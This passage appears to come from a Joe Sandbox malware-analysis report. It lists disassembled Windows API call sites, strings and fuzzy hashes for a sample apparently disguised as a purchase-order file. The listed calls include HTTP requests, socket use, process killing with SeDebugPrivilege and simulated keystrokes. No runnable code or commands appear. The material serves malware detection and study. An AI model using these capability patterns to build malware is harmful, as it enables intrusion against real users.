                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                        • String ID:
                        • API String ID: 2156557900-0
                        • Opcode ID: 222778c4a4eea6ac1425677aadae529a41dfdb04411fe73420945da1f9babe3b
                        • Instruction ID: 76a5153b52725db96f16821b81600b286634917c5a78372f818a5159f893ad60
                        • Opcode Fuzzy Hash: 222778c4a4eea6ac1425677aadae529a41dfdb04411fe73420945da1f9babe3b
                        • Instruction Fuzzy Hash: 54319572A20209AFDB22AF54EC85B7AB7BDAB50395F544025FA04D7160D7F4DDC08B50
                        APIs
                        • GetClientRect.USER32(?), ref: 0032EC32
                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 0032EC49
                        • GetWindowDC.USER32(?), ref: 0032EC55
                        • GetPixel.GDI32(00000000,?,?), ref: 0032EC64
                        • ReleaseDC.USER32(?,00000000), ref: 0032EC76
                        • GetSysColor.USER32(00000005), ref: 0032EC94
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Similarity
                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                        • String ID:
                        • API String ID: 272304278-0
                        APIs
                        • EnumChildWindows.USER32(?,002EDD46), ref: 002EDC86
                        Similarity
                        • API ID: ChildEnumWindows
                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                        • API String ID: 3555792229-1603158881
                        APIs
                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 002B45F0
                        • CoUninitialize.OLE32(?,00000000), ref: 002B4695
                        • UnregisterHotKey.USER32(?), ref: 002B47BD
                        • DestroyWindow.USER32(?), ref: 00325936
                        • FreeLibrary.KERNEL32(?), ref: 0032599D
                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003259CA
                        Similarity
                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                        • String ID: close all
                        • API String ID: 469580280-3243417748
                        APIs
                        • SetWindowLongW.USER32(?,000000EB), ref: 002CC2D2
                          • Part of subcall function 002CC697: GetClientRect.USER32(?,?), ref: 002CC6C0
                          • Part of subcall function 002CC697: GetWindowRect.USER32(?,?), ref: 002CC701
                          • Part of subcall function 002CC697: ScreenToClient.USER32(?,?), ref: 002CC729
                        • GetDC.USER32 ref: 0032E006
                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0032E019
                        • SelectObject.GDI32(00000000,00000000), ref: 0032E027
                        • SelectObject.GDI32(00000000,00000000), ref: 0032E03C
                        • ReleaseDC.USER32(?,00000000), ref: 0032E044
                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0032E0CF
                        Similarity
                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                        • String ID: U
                        • API String ID: 4009187628-3372436214
                        APIs
                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00304C5E
                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00304C8A
                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00304CCC
                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00304CE1
                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00304CEE
                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00304D1E
                        • InternetCloseHandle.WININET(00000000), ref: 00304D65
                          • Part of subcall function 003056A9: GetLastError.KERNEL32(?,?,00304A2B,00000000,00000000,00000001), ref: 003056BE
                        Similarity
                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                        • String ID:
                        • API String ID: 1241431887-3916222277
                        APIs
                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0034DBF0), ref: 0030BBA1
                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0034DBF0), ref: 0030BBD5
                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0030BD33
                        • SysFreeString.OLEAUT32(?), ref: 0030BD5D
                        • StringFromGUID2.OLE32(?,?,00000028,?,0034DBF0), ref: 0030BEAD
                        • ProgIDFromCLSID.OLE32(?,?,?,0034DBF0), ref: 0030BEF7
                        • CoTaskMemFree.OLE32(?,?,?,0034DBF0), ref: 0030BF14
                        Similarity
                        • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                        • String ID:
                        • API String ID: 793797124-0
                        APIs
                        • _memset.LIBCMT ref: 003123E6
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00312579
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0031259D
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003125DD
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003125FF
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00312760
                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00312792
                        • CloseHandle.KERNEL32(?), ref: 003127C1
                        • CloseHandle.KERNEL32(?), ref: 00312838
                        Similarity
                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                        • String ID:
                        • API String ID: 4090791747-0
                        APIs
                        • select.WSOCK32 ref: 00309B38
                        • WSAGetLastError.WSOCK32(00000000), ref: 00309B45
                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00309B6F
                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00309B90
                        • WSAGetLastError.WSOCK32(00000000), ref: 00309B9F
                        • inet_ntoa.WSOCK32(?), ref: 00309C0C
                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00309C51
                        • _memmove.LIBCMT ref: 00309D10
                        Similarity
                        • API ID: ErrorLast$_memmovehtonsinet_ntoaselect
                        • String ID:
                        • API String ID: 1718709218-0
                        APIs
                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0031B204
                        Similarity
                        • API ID: InvalidateRect
                        • String ID:
                        • API String ID: 634782764-0
                        APIs
                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0032E9EA
                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0032EA0B
                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0032EA20
                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0032EA3D
                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0032EA64
                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,002CA57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0032EA6F
                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0032EA8C
                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,002CA57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0032EA97
                        Similarity
                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                        • String ID:
                        • API String ID: 1268354404-0
                        APIs
                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0032E9A0,00000004,00000000,00000000), ref: 002CF737
                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0032E9A0,00000004,00000000,00000000), ref: 002CF77E
                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0032E9A0,00000004,00000000,00000000), ref: 0032EB55
                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0032E9A0,00000004,00000000,00000000), ref: 0032EBC1
                        Similarity
                        • API ID: ShowWindow
                        • String ID:
                        • API String ID: 1268545403-0
                        APIs
                          • Part of subcall function 002B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 002B31DA
                          • Part of subcall function 002F7C0C: GetFileAttributesW.KERNEL32(?,002F6A7B), ref: 002F7C0D
                        • lstrcmpiW.KERNEL32(?,?), ref: 002F7ED2
                        • _wcscmp.LIBCMT ref: 002F7EEA
                        • MoveFileW.KERNEL32(?,?), ref: 002F7F03
                        Similarity
                        • API ID: File$AttributesFullMoveNamePath_wcscmplstrcmpi
                        • String ID:
                        • API String ID: 4093841705-0
                        APIs
                          • Part of subcall function 002EE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 002EE158
                          • Part of subcall function 002EE138: GetCurrentThreadId.KERNEL32 ref: 002EE15F
                          • Part of subcall function 002EE138: AttachThreadInput.USER32(00000000,?,002ECDFB,?,00000001), ref: 002EE166
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 002ECE06
                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002ECE23
                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 002ECE26
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 002ECE2F
                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 002ECE4D
                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 002ECE50
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 002ECE59
                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 002ECE70
                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 002ECE73
                        Similarity
                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                        • String ID:
                        • API String ID: 2014098862-0
                        Similarity
                        • API ID:
                        • String ID: NULL Pointer assignment$Not an Object type
                        • API String ID: 0-572801152
                        APIs
                          • Part of subcall function 002B84A6: __swprintf.LIBCMT ref: 002B84E5
                          • Part of subcall function 002B84A6: __itow.LIBCMT ref: 002B8519
                          • Part of subcall function 002B3BCF: _wcscpy.LIBCMT ref: 002B3BF2
                        • _wcstok.LIBCMT ref: 00301D6E
                        • _wcscpy.LIBCMT ref: 00301DFD
                        • _memset.LIBCMT ref: 00301E30
                        Similarity
                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                        • String ID: X$t:6p:6
                        • API String ID: 774024439-3365093800
                        • Opcode ID: f01cbf328309b3ea8c9387a2476b726b575e218b281cf027f6053ac537589a44
                        • Instruction ID: b648f30fa1294585ee47db297d7b1e4c92d84298b764c4b6cc5f69d194869f48
                        • Opcode Fuzzy Hash: f01cbf328309b3ea8c9387a2476b726b575e218b281cf027f6053ac537589a44
                        • Instruction Fuzzy Hash: B4C18C355187019FC315EF24C891AAAB7E4FF85350F10496DF89A9B2A2DB30ED15CF82
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00311B09
                        • Process32FirstW.KERNEL32(00000000,?), ref: 00311B17
                        • __wsplitpath.LIBCMT ref: 00311B45
                          • Part of subcall function 002D297D: __wsplitpath_helper.LIBCMT ref: 002D29BD
                        • _wcscat.LIBCMT ref: 00311B5A
                        • Process32NextW.KERNEL32(00000000,?), ref: 00311BD0
                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00311BE2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                        • String ID: hE6
                        • API String ID: 1380811348-4214320467
                        • Opcode ID: 95b8ce97021a9334dd8b0db577a2ba20acca89ef7e57c8680978f7338f01451f
                        • Instruction ID: c52283fc5039dc4d82c4296d97c519513cff37f020e3e5266669a2ff4fa2e443
                        • Opcode Fuzzy Hash: 95b8ce97021a9334dd8b0db577a2ba20acca89ef7e57c8680978f7338f01451f
                        • Instruction Fuzzy Hash: C1517D71518300AFC325EF24C885EABB7ECEF88754F10491EF58597291EB70EA54CBA2
                        APIs
                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00319926
                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 0031993A
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00319954
                        • _wcscat.LIBCMT ref: 003199AF
                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 003199C6
                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003199F4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$Window_wcscat
                        • String ID: SysListView32
                        • API String ID: 307300125-78025650
                        • Opcode ID: 8c0bfb2955c671f89cefb1e0556ef869ef6c956db06245ce53d1478265003163
                        • Instruction ID: 59e271f8aba3cd8b1870095abfa5cc3271c37555f2ab98744900aa24510d0c90
                        • Opcode Fuzzy Hash: 8c0bfb2955c671f89cefb1e0556ef869ef6c956db06245ce53d1478265003163
                        • Instruction Fuzzy Hash: AF41AF71A00308ABEB269F64CC85BEE77A8EF0C350F11442AF599A7291C7719D848B60
                        APIs
                          • Part of subcall function 002F6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 002F6F7D
                          • Part of subcall function 002F6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 002F6F8D
                          • Part of subcall function 002F6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 002F7022
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0031168B
                        • GetLastError.KERNEL32 ref: 0031169E
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003116CA
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00311746
                        • GetLastError.KERNEL32(00000000), ref: 00311751
                        • CloseHandle.KERNEL32(00000000), ref: 00311786
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                        • String ID: SeDebugPrivilege
                        • API String ID: 2533919879-2896544425
                        • Opcode ID: 55d87082dbb0426fe847ad42df9b2ea2409cd8d49adb3d5eaf8b5c5c2090d9fa
                        • Instruction ID: 1a533beb99be667de522ebbc309693f4276fe692edd1d8a5dca98131d045ab2e
                        • Opcode Fuzzy Hash: 55d87082dbb0426fe847ad42df9b2ea2409cd8d49adb3d5eaf8b5c5c2090d9fa
                        • Instruction Fuzzy Hash: F341CE71610201AFDB1AEF64D8E1FADB7A5AF48744F098008FA065F3D2DB759844CF41
                        APIs
                        • LoadIconW.USER32(00000000,00007F03), ref: 002F62D6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: IconLoad
                        • String ID: blank$info$question$stop$warning
                        • API String ID: 2457776203-404129466
                        • Opcode ID: 35de5f07b2f0d11a7d2dbc7bb2cb9a963f13e98822831e0d046d77db1f4df315
                        • Instruction ID: 7ac091778b409901d020005dffde77c1d572b07c68d7eda762657ced8148b298
                        • Opcode Fuzzy Hash: 35de5f07b2f0d11a7d2dbc7bb2cb9a963f13e98822831e0d046d77db1f4df315
                        • Instruction Fuzzy Hash: C211A83132834BBED7065E64DC86DBEA39CDF167A4B10003BFE0166682E7F0AA614564
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 002F7595
                        • LoadStringW.USER32(00000000), ref: 002F759C
                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002F75B2
                        • LoadStringW.USER32(00000000), ref: 002F75B9
                        • _wprintf.LIBCMT ref: 002F75DF
                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002F75FD
                        Strings
                        • %s (%d) : ==> %s: %s %s, xrefs: 002F75DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: HandleLoadModuleString$Message_wprintf
                        • String ID: %s (%d) : ==> %s: %s %s
                        • API String ID: 3648134473-3128320259
                        • Opcode ID: b24c014caf1dbeacb56e3a8890b9f4b3dafaa85c8513575987ca9bf70e443588
                        • Instruction ID: b7ed525c66a865739254a38c6080ccf5156241dd0afcfbce9199aa3d818b5609
                        • Opcode Fuzzy Hash: b24c014caf1dbeacb56e3a8890b9f4b3dafaa85c8513575987ca9bf70e443588
                        • Instruction Fuzzy Hash: 080136F6900208BFE752A7D4EDC9EF7776CD704301F4044A6B745E6051EA749E848B75
                        APIs
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                          • Part of subcall function 00313AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00312AA6,?,?), ref: 00313B0E
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00312AE7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: BuffCharConnectRegistryUpper_memmove
                        • String ID:
                        • API String ID: 3479070676-0
                        • Opcode ID: 6e706b93f84833e6b27eb816d102750faadae14320a010ca28364e50d5e5c65e
                        • Instruction ID: 874fdd695b0ac3d3d4a978454253d381a8e242cac6623c2ff185f23577332d44
                        • Opcode Fuzzy Hash: 6e706b93f84833e6b27eb816d102750faadae14320a010ca28364e50d5e5c65e
                        • Instruction Fuzzy Hash: 43917B712142019FCB09EF14C891BAEB7E9FF88754F14881DF5969B2A1DB30E965CF82
                        APIs
                        • __mtinitlocknum.LIBCMT ref: 002DB744
                          • Part of subcall function 002D8A0C: __FF_MSGBANNER.LIBCMT ref: 002D8A21
                          • Part of subcall function 002D8A0C: __NMSG_WRITE.LIBCMT ref: 002D8A28
                          • Part of subcall function 002D8A0C: __malloc_crt.LIBCMT ref: 002D8A48
                        • __lock.LIBCMT ref: 002DB757
                        • __lock.LIBCMT ref: 002DB7A3
                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00366948,00000018,002E6C2B,?,00000000,00000109), ref: 002DB7BF
                        • EnterCriticalSection.KERNEL32(8000000C,00366948,00000018,002E6C2B,?,00000000,00000109), ref: 002DB7DC
                        • LeaveCriticalSection.KERNEL32(8000000C), ref: 002DB7EC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                        • String ID:
                        • API String ID: 1422805418-0
                        • Opcode ID: 7ebedd8766e36d3586095f66c4159093ef8d7628101ce78c2a3c78e02d486780
                        • Instruction ID: 1710396a56c89d21ccd1ce5b661c6675a0b894a22daaaf2691b8ad05cbb45d7c
                        • Opcode Fuzzy Hash: 7ebedd8766e36d3586095f66c4159093ef8d7628101ce78c2a3c78e02d486780
                        • Instruction Fuzzy Hash: BD414871D20206CBFB169F68D854798F7A8BF05335F22821AE529EB3E1D7749C60CB94
                        APIs
                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 002FA1CE
                          • Part of subcall function 002D010A: std::exception::exception.LIBCMT ref: 002D013E
                          • Part of subcall function 002D010A: __CxxThrowException@8.LIBCMT ref: 002D0153
                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 002FA205
                        • EnterCriticalSection.KERNEL32(?), ref: 002FA221
                        • _memmove.LIBCMT ref: 002FA26F
                        • _memmove.LIBCMT ref: 002FA28C
                        • LeaveCriticalSection.KERNEL32(?), ref: 002FA29B
                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 002FA2B0
                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 002FA2CF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                        • String ID:
                        • API String ID: 256516436-0
                        • Opcode ID: d39283918522af00c02e04919944f3545d7ed9d14d19c9167bf60c055ba7dced
                        • Instruction ID: ba566d32f0c5d9040992ac9034fdde043b04092ac5f2653f093b18624ac04653
                        • Opcode Fuzzy Hash: d39283918522af00c02e04919944f3545d7ed9d14d19c9167bf60c055ba7dced
                        • Instruction Fuzzy Hash: 89317E71A00205EBCB01DFA4DC85EAEB7B9EF45710F1480A5F904EB256DB70DE24CBA1
                        APIs
                        • DeleteObject.GDI32(00000000), ref: 00318CF3
                        • GetDC.USER32(00000000), ref: 00318CFB
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00318D06
                        • ReleaseDC.USER32(00000000,00000000), ref: 00318D12
                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00318D4E
                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00318D5F
                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0031BB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00318D99
                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00318DB9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                        • String ID:
                        • API String ID: 3864802216-0
                        • Opcode ID: 1c5a5bbe4599028eefcd52711bb1ba8b14bf9d891a135af86d737eb815217913
                        • Instruction ID: 374d0e5c3c864c1b10a46789281513e2a4f7fb7d75e1a41e3c1d9a7843c14fbe
                        • Opcode Fuzzy Hash: 1c5a5bbe4599028eefcd52711bb1ba8b14bf9d891a135af86d737eb815217913
                        • Instruction Fuzzy Hash: BC319C72200210BFEB168F54EC8AFEA3BADEF4A711F054055FE08DA191CB759841CBB4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ee9319fda196f90aae9507574c3acdc25f5edbebb26f5952c8d110e2d9484f94
                        • Instruction ID: 43aed19dc8751fc968e75ac4a92414ce845982fdea156db77dec0c91ab0e457d
                        • Opcode Fuzzy Hash: ee9319fda196f90aae9507574c3acdc25f5edbebb26f5952c8d110e2d9484f94
                        • Instruction Fuzzy Hash: 1F717F71914109EFCB1ACF98DC85EBEBB78FF89314F148259F915AA251C730AA61CF60
                        APIs
                        • _memset.LIBCMT ref: 0031214B
                        • _memset.LIBCMT ref: 00312214
